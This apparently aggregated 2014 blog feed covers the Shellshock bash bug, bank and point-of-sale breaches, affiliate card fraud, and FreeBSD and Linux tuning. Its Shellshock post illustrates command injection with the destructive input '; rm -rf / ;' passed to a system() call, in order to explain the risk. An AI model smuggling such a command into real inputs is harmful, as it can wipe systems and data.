“This is going to be one that’s with us for a long time, because it’s going to be in a lot of embedded systems that won’t get updated for a long time,” said Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University of California, Berkeley. “The target computer has to be accessible, but there are a lot of ways that this turns accessibility into full local code execution. For example, one could easily write a scanner that would basically scan every Web site on the planet for vulnerable (Web) pages.”

Stay tuned. This one could get interesting very soon.

Today's news all over the place has to do with the nasty bash vulnerability that has been disclosed and now makes everybody go insane. But around this, there's more buzz than actual fire. The problem I think is that there are a number of claims around this vulnerability that are true all by themselves, but become hysteria when mashed together. Tip of the hat to SANS that tried to calm down the situation as well.

Yes, the bug is nasty, and yes the bug can lead to remote code execution; but not all the servers in the world are vulnerable. First of all, not all the UNIX systems out there use bash at all: the BSDs don't have bash installed by default, for instance, and both Debian and Ubuntu have been defaulting to dash for their default shell in years. This is important because the mere presence of bash does not make a system vulnerable. To be exploitable, on the server side, you need at least one of two things: a bash-based CGI script, or /bin/sh being bash. In the former case it becomes obvious: you pass down the CGI variables with the exploit and you have direct remote code execution. In the latter, things are a tad less obvious, and rely on the way system() is implemented in C and other languages: it invokes /bin/sh -c {thestring}.

Using system() is already a red flag for me in lots of server-side software: input sanitization is essential in that situation, as otherwise passing user-provided strings in a system() call makes it trivial to implement remote code execution, think of a software using system("convert %s %s-thumb.png") with an user provided string, and let the user provide ; rm -rf / ; as their input… can you see the problem? But with this particular bash bug, you don't need user-supplied strings to be passed to system(), the mere call will cause the environment to be copied over and thus the code executed. But this relies on /bin/sh to be bash, which is not the case for BSDs, Debian, Ubuntu and a bunch of other situations. But this also requires for the user to be able to change the environment variable.

This does not mean that there is absolutely no risk for Debian or Ubuntu users (or even FreeBSD, but that's a different problem): if you control an environment variable, and somehow the web application invokes (even indirectly) a bash script (through system() or otherwise), then you're also vulnerable. This can be the case if the invoked script has #!/bin/bash explicitly in it. Funnily enough, this is how most clients are vulnerable to this problem: the ISC DHCP client dhclient uses a helper script called dhclient-script to set some special options it receives from the server; at least in the Debian/Ubuntu packages of it, the script uses #!/bin/bash explicitly, making those systems vulnerable even if their default shell is not bash.

But who seriously uses CGI nowadays in production? Turns out that a bunch of people using WordPress do, to run PHP — and I"m sure there are scripts using system(). If this is a nail on the coffin of something, my opinion is that it should be on the coffin of the self-hosting mantra that people still insist on.

On the other hand, the focus of the tech field right now is CGI running in small devices, like routers, TVs, and so on so forth. It is indeed the case that in the majority of those devices implement their web interfaces through CGI, because it's simple and proven, and does not require complex web servers such as Apache. This is what scared plenty of tech people, but it's a scare that has not been researched properly either. While it's true that most of my small devices use CGI, I don't think any of them uses bash. In the embedded world, the majority of the people out there wouldn't go near bash with a 10' pole: it's slow, it's big, and it's clunky. If you're building an embedded image, you probably have already busybox around, and you may as well use it as your shell. It also allows you to use the in-process version of most commands without requiring a full fork.

It's easy to see how you go from A to Z here: "bash makes CGI vulnerable", "nearly all embedded devices use CGI" become "bash makes nearly all embedded devices vulnerable". But that's not true, as SANS points out, it's a minimal part of the devices that is actually vulnerable to this attack. Which does not mean the attack is irrelevant. It's important, and it should tell us many things.

I'll be writing again regarding "project health" and talking a bit more about bash as a project. In the mean time, make sure you update, don't believe the first news of "all fixed" (as Tavis pointed out that the first fix was not thought-out properly) and make sure you don't self-host the stuff you want to keep out of the cloud in a server you upgrade once an year.

BASH shell bug Official PC-BSD Blog | 2014-09-25 19:33 UTC

As many of you are probably aware, there is a serious security issue that is currently all over the web regarding the GNU BASH shell.  We at the PC-BSD project are well aware of the issue, a fix is already in place to plug this security hole, and packages with this fix are currently building. Look for an update to your BASH shell within the next 24 hours in the form of a package update.

As a side note: nothing written by the PC-BSD project uses BASH in any way — and BASH is not built-in to the  FreeBSD operating system itself (it is an optional port/package), so the level of severity of this bug is lower on FreeBSD than on other operating systems.

According to the FreeBSD mailing list: Bryan Drewery has already sent a notice that the port is fixed in FreeBSD. However, since he also added some good recommendations in the email for BASH users, we decided to copy that email here for anyone else that is interested.

From: Bryan Drewery — FreeBSD mailing list

The port is fixed with all known public exploits. The package is
building currently.

However bash still allows the crazy exporting of functions and may still
have other parser bugs. I would recommend for the immediate future not
using bash for forced ssh commands as well as these guidelines:

1. Do not ever link /bin/sh to bash. This is why it is such a big
problem on Linux, as system(3) will run bash by default from CGI.
2. Web/CGI users should have shell of /sbin/nologin.
3. Don’t write CGI in shell script / Stop using CGI
4. httpd/CGId should never run as root, nor “apache”. Sandbox each
application into its own user.
5. Custom restrictive shells, like scponly, should not be written in bash.
6. SSH authorized_keys/sshd_config forced commands should also not be
written in bash.

For more information the bug itself you can visit arstechnica and read the article by clicking the link below.

Conferencing Flameeyes's Weblog | 2014-09-25 18:57 UTC

This past weekend I had the honor of hosting the VideoLAN Dev Days 2014 in Dublin, in the headquarters of my employer. This is the first time I organize a conference (or rather help organize it, Audrey and our staff did most of the heavy lifting), and I made a number of mistakes, but I think I can learn from them and be better the next time I'll try something like this.

Photo credit: me
Organizing an event in Dublin has some interesting and not-obvious drawbacks, one of which is the need for a proper visa for people who reside in Europe but are not EEA citizens, thanks to the fact that Ireland is not part of Schengen. I was expecting at least UK residents not to need any scrutiny, but Derek proved me wrong as he had to get an (easy) visa at entrance.

Getting just shy of a hundred people in a city like Dublin, which is by far not a metropolis like Paris or London would be is an interesting exercise, yes we had the space for the conference itself, but finding hotels and restaurants for the amount of people became tricky. A very positive shout out is due to Yamamori Sushi that hosted the whole of us without a fixed menu and without a hitch.

As usual, meeting in person with the people you work with in open source is a perfect way to improve collaboration — knowing how people behave face to face makes it easier to understand their behaviour online, which is especially useful if the attitudes can be a bit grating online. And given that many people, including me, are known as proponent of Troll-Driven Development – or Rant-Driven Development given that people like Anon, redditors and 4channers have given an even worse connotation to Troll – it's really a requirement, if you are really interested to be part of the community.

This time around, I was even able to stop myself from gathering too much swag! I decided not to pick up a hoodie, and leave it to people who would actually use it, although I did pick up a Gandi VLC shirt. I hope I'll be able to do that at LISA as I'm bound there too, and last year I came back with way too many shirts and other swag.

A Texas bank that’s suing a customer to recover $1.66 million spirited out of the country in a 2012 cyberheist says it now believes the missing funds are still here in the United States — in a bank account that’s been frozen by the federal government as part of an FBI cybercrime investigation.

In late June 2012, unknown hackers broke into the computer systems of Luna & Luna, LLP, a real estate escrow firm based in Garland, Texas. Unbeknownst to Luna, hackers had stolen the username and password that the company used to managed its account at Texas Brand Bank (TBB), a financial institution also based in Garland.

Between June 21, 2012 and July 2, 2012, fraudsters stole approximately $1.75 million in three separate wire transfers. Two of those transfers went to an account at the Industrial and Commercial Bank of China. That account was tied to the Jixi City Tianfeng Trade Limited Company in China. The third wire, in the amount of $89,651, was sent to a company in the United States, and was recovered by the bank.

Jixi is in the Heilongjiang province of China on the border with Russia, a region apparently replete with companies willing to accept huge international wire transfers without asking too many questions. A year before this cyberheist took place, the FBI issued a warning that cyberthieves operating out of the region had been the recipients of approximately $20 million in the year prior — all funds stolen from small to mid-sized businesses through a series of fraudulent wire transfers sent to Chinese economic and trade companies (PDF) on the border with Russia.

Luna became aware of the fraudulent transfers on July 2, 2012, when the bank notified the company that it was about to overdraw its accounts. The theft put Luna & Luna in a tough spot: The money the thieves stole was being held in escrow for the U.S. Department of Housing and Urban Development (HUD). In essence, the crooks had robbed Uncle Sam, and this was exactly the argument that Luna used to talk its bank into replacing the missing funds as quickly as possible.

“Luna argued that unless TBB restored the funds, Luna and HUD would be severely damaged with consequences to TBB far greater than the sum of the swindled funds,” TBB wrote in its original complaint (PDF). TBB notes that it agreed to reimburse the stolen funds, but that it also reserved its right to legal claims against Luna to recover the money.

When TBB later demanded repayment, Luna refused. The bank filed suit on July 1, 2013, in state court, suing to recover the approximately $1.66 million that it could not claw back, plus interest and attorney’s fees.

For the ensuing year, TBB and Luna wrangled in the courts over the venue of the trial. Luna also counterclaimed that the bank’s security was deficient because it only relied on a username and password, and that TBB should have flagged the wires to China as highly unusual.

TBB notes that per a written agreement with the bank, Luna had instructed the bank to process more than a thousand wire transfers from its accounts to third-party accounts. Further, the bank pointed out that Luna had been offered but refused “dual controls,” a security measure that requires two employees to sign off on all wire transfers before the money is allowed to be sent.

In August, Luna alerted (PDF) the U.S. District Court for the Northern District of Texas that in direct conversations with the FBI, an agent involved in the investigation disclosed that the $1.66 million in stolen funds were actually sitting in an account at JPMorgan Chase, which was the receiving bank for the fraudulent wires. Both Luna and TBB have asked the government to consider relinquishing the funds to help settle the lawsuit.

The FBI did not return calls seeking comment. The Office of the U.S. attorney for the Northern District of Texas, which is in the process of investigating potential criminal claims related to the fraudulent transfers, declined to comment except to say that the case is ongoing and that no criminal charges have been filed to date.

As usual, this cyberheist resulted from missteps by both the bank and the customer. Dual controls are a helpful — but not always sufficient — security control that Luna should have adopted, particularly given how often these cyberheists are perpetrated against title and escrow firms. But it is galling that it is easier to find more robust, customer-facing security controls at your average email or other cloud service provider than it is at one of thousands of financial institutions in the United States.

If you run a small business and are managing your accounts online, you’d be wise to expect a similar attack on your own accounts and prepare accordingly. That means taking your business to a bank that offers more than just usernames, passwords and tokens for security. Shop around for a bank that lets you secure your transfers with some sort of additional authentication step required from a mobile device. These security methods can be defeated of course, but they present an extra hurdle for the bad guys, who probably are more likely to go after the lower-hanging fruit at thousands of other financial institutions that don’t offer more modern security approaches.

But if you’re expecting your bank to protect your assets should you or one of your employees fall victim to a malware phishing scheme, you could be in for a rude awakening. Keep a close eye on your books, require that more than one employee sign off on all large transfers, and consider adopting some of these: Online Banking Best Practices for Businesses.

Almost an entire year ago (just a few days apart) I announced my first published book, called SELinux System Administration. The book covered SELinux administration commands and focuses on Linux administrators that need to interact with SELinux-enabled systems.

An important part of SELinux was only covered very briefly in the book: policy development. So in the spring this year, Packt approached me and asked if I was interested in authoring a second book for them, called SELinux Cookbook. This book focuses on policy development and tuning of SELinux to fit the needs of the administrator or engineer, and as such is a logical follow-up to the previous book. Of course, given my affinity with the wonderful Gentoo Linux distribution, it is mentioned in the book (and even the reference platform) even though the book itself is checked against Red Hat Enterprise Linux and Fedora as well, ensuring that every recipe in the book works on all distributions. Luckily (or perhaps not surprisingly) the approach is quite distribution-agnostic.

Today, I got word that the SELinux Cookbook is now officially published. The book uses a recipe-based approach to SELinux development and tuning, so it is quickly hands-on. It gives my view on SELinux policy development while keeping the methods and processes aligned with the upstream policy development project (the reference policy).

It’s been a pleasure (but also somewhat a pain, as this is done in free time, which is scarce already) to author the book. Unlike the first book, where I struggled a bit to keep the page count to the requested amount, this book was not limited. Also, I think the various stages of the book development contributed well to the final result (something that I overlooked a bit in the first time, so I re-re-reviewed changes over and over again this time – after the first editorial reviews, then after the content reviews, then after the language reviews, then after the code reviews).

You’ll see me blog a bit more about the book later (as the marketing phase is now starting) but for me, this is a major milestone which allowed me to write down more of my SELinux knowledge and experience. I hope it is as good a read for you as I hope it to be.

More than seven weeks after this publication broke the news of a possible credit card breach at nationwide sandwich chain Jimmy John’s, the company now confirms that a break-in at one of its payment vendors jeopardized customer credit and debit card information at 216 stores.

On July 31, KrebsOnSecurity reported that multiple banks were seeing a pattern of fraud on cards that were all recently used at Jimmy John’s locations around the country. That story noted that the company was working with authorities on an investigation, and that multiple Jimmy John’s stores contacted by this author said they ran point-of-sale systems made by Newtown, Pa.-based Signature Systems.

In a statement issued today, Champaign, Ill. based Jimmy John’s said customers’ credit and debit card data was compromised after an intruder stole login credentials from the company’s point-of-sale vendor and used these credentials to remotely access the point-of-sale systems at some corporate and franchised locations between June 16, 2014 and Sept. 5, 2014.

“Approximately 216 stores appear to have been affected by this event,” Jimmy John’s said in the statement. “Cards impacted by this event appear to be those swiped at the stores, and did not include those cards entered manually or online. The credit and debit card information at issue may include the card number and in some cases the cardholder’s name, verification code, and/or the card’s expiration date. Information entered online, such as customer address, email, and password, remains secure.”

The company has posted a listing on its Web site — — of the restaurant locations affected by the intrusion. There are more than 1,900 franchised Jimmy John’s locations across the United States, meaning this breach impacted roughly 11 percent of all stores.

The statement from Jimmy John’s doesn’t name the point of sale vendor, but company officials confirm that the point-of-sale vendor that was compromised was indeed Signature Systems. Officials from Signature Systems could not be immediately reached for comment, and it remains unclear if other companies that use its point-of-sale solutions may have been similarly impacted.

Point-of-sale vendors remain an attractive target for cyber thieves, perhaps because so many of these vendors enable remote administration on their hardware and yet secure those systems with little more than a username and password — and often easy-to-guess credentials to boot.

Last week, KrebsOnSecurity reported that a different hacked point-of-sale provider was the driver behind a breach that impacted more than 330 Goodwill locations nationwide. That breach, which targeted payment vendor C&K Systems Inc., persisted for 18 months, and involved two other as-yet unnamed C&K customers.

Mehr als 15 Cent Hanno's blog | 2014-09-22 14:48 UTC

Seit Monaten können wir fast täglich neue Schreckensmeldungen über die Ebola-Ausbreitung lesen. Ich denke die muss ich hier nicht wiederholen.

Ebola ist für viele von uns - mich eingeschlossen - weit weg. Und das nicht nur im räumlichen Sinne. Ich habe noch nie einen Ebola-Patienten gesehen, über die betroffenen Länder wie Sierra Leone, Liberia oder Guinea weiß ich fast nichts. Ähnlich wie mir geht es sicher vielen. Ich habe viele der Meldungen auch nur am Rande wahrgenommen. Aber eine Sache habe ich mitgenommen: Das Problem ist nicht das man nicht wüsste wie man Ebola stoppen könnte. Das Problem ist dass man es nicht tut, dass man denen, die helfen wollen - oftmals unter Einsatz ihres eigenen Lebens - nicht genügend Mittel zur Verfügung stellt.

Eine Zahl, die ich in den letzten Tagen gelesen habe, beschäftigt mich: Die Bundesregierung hat bisher 12 Millionen Euro für die Ebola-Hilfe zur Verfügung gestellt. Das sind umgerechnet etwa 15 Cent pro Einwohner. Mir fehlen die Worte das adäquat zu beschreiben. Es ist irgendwas zwischen peinlich, verantwortungslos und skandalös. Deutschland ist eines der wohlhabendsten Länder der Welt. Vergleiche mit Bankenrettungen oder Tiefbahnhöfen erspare ich mir jetzt.

Ich habe gestern einen Betrag an Ärzte ohne Grenzen gespendet. Ärzte ohne Grenzen ist soweit ich das wahrnehme im Moment die wichtigste Organisation, die vor Ort versucht zu helfen. Alles was ich über Ärzte ohne Grenzen weiß gibt mir das Gefühl dass mein Geld dort gut aufgehoben ist. Es war ein Betrag, der um mehrere Größenordnungen höher als 15 Cent war, aber es war auch ein Betrag, der mir mit meinen finanziellen Möglichkeiten nicht weh tut.

Ich finde das eigentlich nicht richtig. Ich finde es sollte selbstverständlich sein dass in so einer Notsituation die Weltgemeinschaft hilft. Es sollte nicht von Spenden abhängen, ob man eine tödliche Krankheit bekämpft oder nicht. Ich will eigentlich mit meinen Steuergeldern für so etwas zahlen. Aber die Realität ist: Das geschieht im Moment nicht.

Ich schreibe das hier nicht weil ich betonen möchte wie toll ich bin. Ich schreibe das weil ich Dich, der das jetzt liest, bitten möchte, das selbe tust. Ich glaube jeder, der hier mitliest, ist in der Lage, mehr als 15 Cent zu spenden. Spende einen Betrag, der Dir angesichts Deiner finanziellen Situation bezahlbar und angemessen erscheint. Jetzt sofort. Es dauert nur ein paar Minuten:

Online für Ärzte ohne Grenzen spenden

(Ich freue mich wenn dieser Beitrag verbreitet / geteilt wird - zum Beispiel mit dem Hashtag #mehrals15cent)

Hardly a week goes by when I don’t hear from a reader wondering about the origins of a bogus credit card charge for $49.95 or some similar amount for a product they never ordered. As this post will explain, such charges appear to be the result of crooks trying to game various online affiliate programs by using stolen credit cards.

Bogus $49.95 charges for herbal weight loss products like these are showing up on countless consumer credit statements.
Most of these charges are associated with companies marketing products of dubious value and quality, typically by knitting a complex web of front companies, customer support centers and card processing networks. Whether we’re talking about a $49.95 payment for a bottle of overpriced vitamins, $12.96 for some no-name software title, or $9.84 for a dodgy Internet marketing program, the unauthorized charge usually is for a good or service that is intended to be marketed by an online affiliate program.

Affiliate programs are marketing machines built to sell a huge variety of products or services that are often of questionable quality and unknown provenance. Very often, affiliate programs are promoted using spam, and the stuff pimped by them includes generic prescription drugs, vitamins and “nutriceuticals,” and knockoff designer purses, watches, handbags, shoes and sports jerseys.

At the core of the affiliate program is a partnership of convenience: The affiliate managers handle the boring backoffice stuff, including the customer service, product procurement (suppliers) and order fulfillment (shipping). The sole job of the “affiliates” — the commission-based freelance marketers who sign up to promote whatever is being sold by the affiliate program — is to drive traffic and sales to the program.


It is no surprise, then, that online affiliate programs like these often are overrun with scammers, spammers and others easily snagged by the lure of get-rich-quick schemes. In June, I began hearing from dozens of readers about unauthorized charges on their credit card statements for $49.95. The charges all showed up alongside various toll-free 888- numbers or names of customer support Web sites, such as supportacr[dot]com and acrsupport[dot]com. Readers who called these numbers or took advantage of the chat interfaces at these support sites were all told they’d ordered some kind of fat-burning pill or vitamin from some random site, such as greenteahealthdiet[dot]com or naturalfatburngarcinia[dot]com.

Those sites were among tens of thousands that are being promoted via spam, according to Gary Warner, chief technologist at Malcovery, an email security firm. The Web site names themselves are not included in the spam; rather, the spammers include a clickable URL for a hacked Web site that, when visited, redirects the user to the pill shop’s page. This redirection is done to avoid having the pill shop pages indexed by anti-spam filters and other types of blacklists used by security firms, Warner said.

The spam advertising these pill sites is not typical junk email blasted by botnet-infected home PCs, but rather is mostly “Webspam” sent via hacked Webmail accounts, said Damon McCoy, an assistant professor of computer science at George Mason University.

“Herbal spam from compromised Webmail accounts is a huge problem,” said McCoy, who has co-authored numerous studies on dodgy affiliate programs.

A support Web site named after the same number that appears on the “customer’s” credit card statement.
Several sources at financial institutions that have been helping customers battle these charges say most of those customers at one point in the past used their credit cards to donate to one of several religious, political activist, and social service organizations online. I may at some point post another story about this aspect of the fraud if I can firm it up any more.

McCoy believes that most of the fraudulent charges associated with these affiliate program Web sites are the result of rogue affiliates who are merely abusing the affiliate program to “cash out” credit card numbers stolen in data breaches or purchased from underground stores that sell stolen card data.

“My guess is these are ‘legit’ herbal affiliate programs that are getting burned by bad affiliates,” McCoy said.

Affiliate fraud was a major problem for the two captains of competing pharmacy spam affiliate programs who are profiled in my upcoming book, Spam Nation. Most of the affiliate programs featured in my book dealt with the problem of scammers trying to use stolen cards to generate phony sales by placing two-week “holds” or “holdbacks” on all affiliate commissions: That way, if an affiliate’s “purchases” generated too many chargebacks, the affiliate program could terminate the affiliate and avoid paying commissions on the fraudulent charges.

But McCoy said it’s likely that this herbal affiliate program is not employing holdbacks, at least not in any timeframe that could deter rogue affiliates from running stolen cards through the system.

“If this affiliate program doesn’t have a holdback, they are a great target for this type of fraud,” McCoy said.

As if in recognition of this problem, the herbal pill Web sites ultimately promoted in these Webspam attacks are tied to a sprawling network of thousands of similar sites, all of which come with their own dedicated customer support Web site and phone number (866- and 888- numbers). Those same support phone numbers are listed next to the fraudulent charges on customers’ monthly credit card statements. In virtually all cases, the organization names listed on these support Web sites are legally registered, incorporated companies based in Florida.

All of the banks I spoke with in researching this story said customers told them that the support staff answering the phones at the 888- and 866- numbers tied to the herbal pill sites were more than happy to reverse the fraudulent charges. The last thing these affiliate programs want is a bunch of chargebacks: Too many chargebacks can cause the merchant to lose access to Visa and MasterCard’s processing networks, and can bring steep fines.

Not that legitimate customers of these dodgy vitamin shops are in for the best customer service experience either.  Very often, ordering from one of these affiliate marketing programs invites even more trouble. A note appended in fine print to the bottom of the checkout page on all of the herbal pill sites advises: “As part of your subscription, you will automatically receive additional bottles every 3 Months. Your credit card used in this initial order will be used for future automatic orders, and will be charged $148.00 (Includes S/H).”

If you see charges like these or any other activity on your credit or debit card that you did not authorize, contact your bank and report the fraud immediately. I think it’s also a good idea in cases like this to request a new card in the odd chance your bank doesn’t offer it: After all, it’s a good bet that your card is in the hands of crooks, and is likely to be abused like this again.

Daemonische Webschleuder My Universe | 2014-09-21 19:15 UTC

Apache und Nginx gehören (zumindest laut Netcraft) zu den meistgenutzten Webservern. Wer einen der beiden genannten Webserver verwendet und als Unterbau auf FreeBSD setzt, kann beiden auch noch ordentlich Beine machen — und nebenbei die Systemlast senken. Dafür braucht man keine schwarze Magie, sondern lediglich ein Kernel-Modul1 namens accf_http. Selbiges ist übrigens keinesfalls neu; es wurde bereits mit FreeBSD 4.0 eingeführt und existiert somit schon seit guten 14 Jahren.

Dahinter verbirgt sich ein Modul der accept_filter Familie, das speziell auf das HTTP-Protokoll zugeschnitten ist. Selbiges bewirkt, dass FreeBSD's Netzwerk-Stack erst den kompletten HTTP Request entgegennimmt, bevor der entsprechende Socket der Anwendung signalisiert, dass eine eingehende Verbindungsanfrage angekommen ist. Die Logik für's parsen unvollständiger HTTP Requests kann so getrost ausgeknipst werden, da der Webserver sich darauf verlassen kann, dass hier ein vollständiger Request vorliegt.

Ein weiterer Nebeneffekt: Unvollständige Requests blockieren keinen Prozess oder Thread des Webservers, wodurch besonders der Apache Webserver vom HTTP Accept Filter profitiert. Nginx arbeitet mit nicht blockierenden Sockets und reserviert — anders als die meisten Apache MPMs — nicht für eingehende Verbindungen einen extra Thread oder Prozess, so dass Nginx durch unvollständige Requests nicht dazu getrieben wird, zusätzliche Prozesse oder Threads zu starten. Allerdings muss auch Nginx alle eingegangenen Verbindungen ständig abprüfen, um herauszubekommen, auf welcher endlich ein vollständiger Request vorliegt.

Die Ressourcenersparnis ist designbedingt bei Nginx also nicht so groß wie beim Apachen. Dadurch, dass nur vollständige Requests in der Verbindungsqueue landen, wird die Abarbeitung von Requests jedoch signifikant beschleunigt, was insbesondere dann ins Gewicht fällt, wenn die Beantwortung des Requests selbst kaum Rechenzeit benötigt (etwa weil sie aus dem Cache heraus geschieht) — eine aufwändige dynamische Webapplikation profitiert hier also weniger, da ein Großteil der Gesamtzeit der Beantwortung auf die Berechnung der Antwort entfällt, und nicht auf die Entgegennahme des Requests.

Und wie kommt man jetzt in den Genuss dieser Funktionalität? Wer den Apachen einsetzt, muss lediglich dafür Sorge tragen, dass das Kernel-Modul vor dem Start des Indianers geladen wurde, etwa indem es in /boot/loader.conf eingetragen wird:

Steht das Modul zur Verfügung oder wurde es fest in den Kernel eingebaut, nutzt Apache den Accept Filter ohne weiteres Zutun. Ist er hingegen nicht verfügbar, beschwert sich Apache sogar regelrecht mit einer Warnmeldung:

[warn] No such file or directory: Failed to enable the 'httpready' Accept Filter

Nginx hingegen benötigt ein wenig Ermunterung, um auf den Accept Filter zurückzugreifen:

server {  
    listen accept_filter=httpready;
Der Fairness halber sei aber gesagt, dass es damit alleine nicht getan ist. Um nicht nur Ressourcen zu sparen, sondern wirklich mehr Performance zu erzielen, kommt man nicht umhin, sich auch mit anderen Tuning-Optionen auseinanderzusetzen und dabei Einstellungen zu ermitteln, die zum tatsächlichen Einsatzzweck des Webservers passen. Als Stichwort seien hier die sysctl-Variablen kern.ipc.soacceptqueue, kern.ipc.maxsockbuf, net.inet.tcp.sendspace sowie net.inet.tcp.recvspace genannt. Umfangreichere Informationen dazu bietet z. B. der Network Tuning Guide auf

1. Alternativ kann man den Filter auch mit options ACCEPT_FILTER_HTTP fest in den Kernel einkompilieren

Outreach Program for Women Luca Barbato | 2014-09-21 13:49 UTC

Libav participated in the summer edition of the OPW. We had three interns Alexandra, Katerina and Nidhi.


The three interns had different starting skills so the projects picked had a different breadth and scope.

Small tasks

Everybody has to start from a simple task and they did as well. Polishing crufty code is one of the best ways to start learning how it works. In the Libav case we have plenty of spots that require extra care and usually hidden bugs get uncovered that way.

Not so small tasks
Katerina decided to do something radical from the start and she tried to use coccinelle to fix a whole class of issues in a single swoop: I’m still reviewing the patch and splitting it in smaller chunks to single out false positives. The patch itself gave some spotlights to some of the most horrible code still lingering around, hopefully we’ll get to fix those part soon =)

Demuxer rewrite

Alexandra and Katerina showed interest in specific targeted tasks, they honed their skills by reimplementing the ASF and RealMedia demuxer respectively. They even participated in the first Libav Summer Sprint in Torino and worked together with their mentor in person.

They had to dig through the specifications and figure out why some sample files behave in unexpected ways.

They are almost there and hopefully our next release will see brand new demuxers!

Jack of all trades

Libav has plenty of crufty code that requires some love, plenty of overly long files, lots of small quirks that should be ironed out. Libav (as any other big projects) needs some refactoring here and there.

Nidhi’s task was mainly focused on fixing some of those and help others doing the same by testing patches. She had to juggle many different tasks and learn about many different parts of the codebase and the toolset we use.

It might not sound as extreme as replacing ancient code with something completely new (and make it work at least as well as the former), but both kind of tasks are fundamental to keep the project healthy!

In closing

All the projects have been a success and we are looking forward to see further contributions from our new members!

bcache Patrick's playground | 2014-09-21 11:59 UTC

My "sacrificial box", a machine reserved for any experimentation that can break stuff, has had annoyingly slow IO for a while now. I've had 3 old SATA harddisks (250GB) in a RAID5 (because I don't trust them to survive), and recently I got a cheap 64GB SSD that has become the new rootfs initially.

The performance difference between the SATA disks and the SSD is quite amazing, and the difference to a proper SSD is amazing again. Just for fun: the 3-disk RAID5 writes random data at about 1.5MB/s, the crap SSD manages ~60MB/s, and a proper SSD (e.g. Intel) easily hits over 200MB/s. So while this is not great hardware it's excellent for demonstrating performance hacks.

Recent-ish kernels finally have bcache included, so I decided to see if I can make use of it. Since creating new bcache devices is destructive I copied all data away, reformated the relevant partitions and then set up bcache. So the SSD is now 20GB rootfs, 40GB cache. The raid5 stays as it is, but gets reformated with bcache.
In code:
wipefs /dev/md0 # remove old headers to unconfuse bcache
make-bcache -C /dev/sda2 -B /dev/md0 --writeback --cache_replacement_policy=lru
mkfs.xfs /dev/bcache0 # no longer using md0 directly!
Now performance is still quite meh, what's the problem? Oh ... we need to attach the SSD cache device to the backing device!
ls /sys/fs/bcache/
45088921-4709-4d30-a54d-d5a963edf018  register  register_quiet
That's the UUID we need, so:
echo 45088921-4709-4d30-a54d-d5a963edf018 > /sys/block/bcache0/bcache/attach
and dmesg says:
[  549.076506] bcache: bch_cached_dev_attach() Caching md0 as bcache0 on set 45088921-4709-4d30-a54d-d5a963edf018

So what about performance? Well ... without any proper benchmarks, just copying the data back I see very different behaviour. iotop shows writes happening at ~40MB/s, but as the network isn't that fast (100Mbit switch) it's only writing every ~5sec for a second.
Unpacking chromium is now CPU-limited and doesn't cause a minute-long IO storm. Responsivity while copying data is quite excellent.

The write speed for random IO is a lot higher, reaching maybe 2/3rds of the SSD natively, but I have 1TB storage with that speed now - for a $25 update that's quite amazing.

Another interesting thing is that bcache is chunking up IO, so the harddisks are no longer making an angry purring noise with random IO, instead it's a strange chirping as they only write a few larger chunks every second. It even reduces the noise level?! Neato.

First impression: This is definitely worth setting up for new machines that require good IO performance, the only downside for me is that you need more hardware and thus a slightly bigger budget. But the speedup is "very large" even with a cheap-crap SSD that doesn't even go that fast ...

Edit: ioping, for comparison:
native sata disks:
32 requests completed in 32.8 s, 34 iops, 136.5 KiB/s
min/avg/max/mdev = 194 us / 29.3 ms / 225.6 ms / 46.4 ms

bcache-enhanced, while writing quite a bit of data:
36 requests completed in 35.9 s, 488 iops, 1.9 MiB/s
min/avg/max/mdev = 193 us / 2.0 ms / 4.4 ms / 1.2 ms

Definitely awesome!

The second BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

I started digging deeper into the RSS performance on my home test platform. Four cores and one (desktop) socket isn't all that much, but it's a good starting point for this.

It turns out that there was some lock contention inside netisr. Which made no sense, as RSS should be keeping all the flows local to each CPU.

After a bunch of digging, I discovered that the NIC was occasionally receiving packets into the wrong ring. Have a look at tihs:

Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff80047713d00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff8004742e100; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff800474c2e00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff800474c5000; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff8004742ec00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff8004727a700; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80006f11600; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80047279b00; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80006f0b700; flowid=0x335a5c03; rxr->me=2

The RX flowid was correct - I hashed the packets in software too and verified the software hash equaled the hardware hash. But they were turning up on the wrong receive queue. "rxr->me" is the queue id; the hardware should be hashing on the last 7 bits. 0x3 -> ring 3, 0x2 -> ring 2.

It also only happened when I was sending traffic to more than one receive ring. Everything was okay if I just transmitted to a single receive ring.

Luckily for me, some developers from Verisign saw some odd behaviour in their TCP stress testing and had dug in a bit further. They were seeing corrupted frames on the receive side that looked a lot like internal NIC configuration state. They figured out that the ixgbe(4) driver wasn't initialising the flow director and receive units correctly - the FreeBSD driver was not correctly setting up the amount of memory each was allocated on the NIC and they were overlapping. They also found a handful of incorrectly handled errors and double-freed mbufs.

So, with that all fixed, their TCP problem went away and my UDP tests started properly behaving themselves. Now all the flows are ending up on the right CPUs.

The flow director code was also dynamically programming flows into the NIC to try and rebalance traffic. Trouble is, I think it's a bit buggy and it's likely not working well with generic receive offload (LRO).

